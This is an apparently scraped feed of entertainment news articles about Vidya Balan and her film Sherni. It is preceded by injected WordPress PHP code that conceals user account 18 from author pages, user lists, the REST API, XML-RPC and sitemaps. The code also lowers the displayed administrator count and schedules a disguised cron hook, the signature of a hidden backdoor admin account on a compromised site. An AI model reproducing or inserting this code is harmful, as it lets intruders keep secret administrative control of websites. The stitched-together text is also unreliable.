add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Not every biopic is impactful or well made : Vidya Balan appeared first on The Edge Media.
]]>Vidya Balan has so far featured in the biopics The Dirty Picture (2011) and Shakuntala Devi (2020). The Dirty Picture is inspired by the life of late actor Silk Smitha. Last year, Vidya starred in and as Shakuntala Devi.
Speaking with Pinkvilla, Vidya Balan said, “Not every biopic is impactful or well made. I have been offered so many biopics, but I decided on doing very few. Sometimes, it’s an inspiring story but not dramatic or cinematic enough. A biopic needs all the elements to be interesting. At times, it is great to read about somebody but you don’t see it as a celluloid experience.”
She also added, “There is an explosion of biopics but not every biopic is going to be watched. Only good ones will work and there has to be something unique that differentiates a biopic from the other ones. The structure of biopics is pretty much the same for everything and it can get boring after a while. Just an inspiring story or personality is not enough for a biopic, it has to be told in a unique manner. There could be 100s of them, but only a few will make the cut.”
Meanwhile, Vidya was last seen in the Amazon Prime Video’s Sherni. She played the role of Vidya Vincent–a forest officer. Recently, the actor’s short film Natkhat was also released.
The post Not every biopic is impactful or well made : Vidya Balan appeared first on The Edge Media.
]]>The post Ila Arun talks about “Sherni” appeared first on The Edge Media.
]]>A few scenes where she responds as her mother-in-law (played by Ila Arun) puts forth her expectations are especially telling. For instance, the sequence where Ila Arun’s character tells Vidya to wear jewelry when they are going to her colleague’s house for dinner showed how women have expectations from their daughters-in-law but not their sons.
Talking about the scene and her character, Ila told that while she doesn’t feel her role was of a “conservative” mother-in-law, she can understand why today’s generation can see her as a part of the problem.
“Her aspiration and behaviour is akin to how an Indian mother-in-law will behave in the real world too. In the scene, where my character tells Vidya to dress up, my character is sketched in a way that she wants Vidya to feel loved as well. There is a sort of competition between the mother and the mother-in-law because I want to put across that she is mine too. So, I am not conservative but maybe a possessive mother who will always keep her son as her priority, which is natural and happens in real life too,” she said..
The post Ila Arun talks about “Sherni” appeared first on The Edge Media.
]]>The post Netizens laud Vidya Balan’s acting, say ‘you wouldn’t want to miss this’ appeared first on The Edge Media.
]]>Sherni released on OTT platform Amazon Prime Video on June 18 at midnight. Vidya Balan also took to Twitter to share how special Sherni is to her. She tweeted, “This one is always going to be special! Here’s to all the tigresses… always keep your head and spirit high.”

Vidya Balan’s portrayal of a strong character in Sherni has impressed the netizens. A fan wrote, “Still watching, but what a movie so far. Take a bow Vidya Balan, Vijay Raaz and the entire cast of #Sherni along with Amit Masurkar’s brilliant direction. You wouldn’t want to miss this one.” Another tweeted, “In the pool of mediocre cinema, there’s always a Sherni that stands out and that’s @vidya_balan.” It appears that after delivering films like The Dirty Picture, Kahaani and No One Killed Jessica, Vidya Balan has roared again with Sherni.




Sherni” is the latest Balan film to put a woman in the forefront and follow her struggle, after a series of movies like “Shakuntala Devi” (2020), “Mission Mangal” (2019) and 2017 drama “Tumhari Sulu”.
The post Netizens laud Vidya Balan’s acting, say ‘you wouldn’t want to miss this’ appeared first on The Edge Media.
]]>The post Sherni is for every women who navigate their way and overcome several challenges : Vidya Balan appeared first on The Edge Media.
]]>During a virtual press conference, the actor said the film is a representation of women of all kinds, who are striving to make a change.
“You don’t need to roar to be a tigress. There are various shades, reflections of ‘sherni’ (tigress) that each of us represents. My character is a woman of few words, reserved but strong-willed. So you can be that.”
“You don’t have to scream out loud from the rooftops to be heard all the time or even be visible all the time. In each of the households in India, there’s a ‘sherni’ and a lot of times she’s invisible. This is my salute to all of them out there,” Balan told reporters.
Produced by T-Series and Abundantia Entertainment, “Sherni” is set to stream on Amazon Prime Video on June 18.
The post Sherni is for every women who navigate their way and overcome several challenges : Vidya Balan appeared first on The Edge Media.
]]>